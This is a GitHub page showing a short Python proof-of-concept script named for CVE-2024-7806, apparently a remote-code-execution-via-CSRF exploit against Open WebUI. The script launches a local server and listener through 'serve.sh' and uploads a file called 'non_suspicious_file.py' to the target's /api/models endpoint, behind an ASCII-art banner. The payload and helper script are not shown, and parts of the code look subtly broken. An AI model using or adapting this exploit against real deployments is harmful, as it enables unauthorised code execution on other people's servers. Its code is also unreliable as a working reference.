-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2024-7806.py
60 lines (48 loc) · 1.99 KB
/
CVE-2024-7806.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import argparse
import sys
import subprocess
import requests
ascii_green_color = "\x1b[32m"
ascii_red_color = "\x1b[1;31m"
ascii_purple = "\033[35m"
ascii_reset = "\u001B[0m"
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=False, type=str, help="Target URL")
cli_arguments = parser.parse_args()
url = cli_arguments.url
is_amount_of_args_valid = 0 < len(sys.argv) < 2
is_arguments_valid = (url is not None and url != '')
if is_amount_of_args_valid or is_arguments_valid:
exploit(url)
else:
parser.print_help()
exit(1)
def exploit(url):
# starting web server and listener in different tabs
subprocess.run(["bash", "-c", "./serve.sh"])
# uploading file
file = open("non_suspicious_file.py", "rb")
response = requests.post(url + "/api/models", files=file)
if response.status_code != 200:
print(ascii_red_color + "Couldn't load file. ")
else:
print(ascii_green_color + "File loaded successfully." + ascii_reset)
def banner():
print(ascii_purple)
print('''
_ _ ____ ____ _____
___ _ __ ___ _ __ __ _____| |__ _ _(_) | _ \\ / ___| ____|
/ _ \\| '_ \\ / _ \\ '_ \\ ____\\ \\ /\\ / / _ \\ '_ \\| | | | | | |_) | | | _|
| (_) | |_) | __/ | | |_____\\ V V / __/ |_) | |_| | | | _ <| |___| |___
\\___/| .__/ \\___|_| |_| \\_/\\_/ \\___|_.__/ \\__,_|_| |_| \\_\\____|_____|
|_| ____ ____ ____ _____
__ _(_) __ _ / ___/ ___|| _ \\| ___|
\\ \\ / / |/ _` | | | \\___ \\| |_) | |_
\\ V /| | (_| | | |___ ___) | _ <| _|
\\_/ |_|\\__,_| \\____|____/|_| \\_\\_|
''')
print(ascii_reset)
if __name__ == '__main__':
banner()
parse_arguments()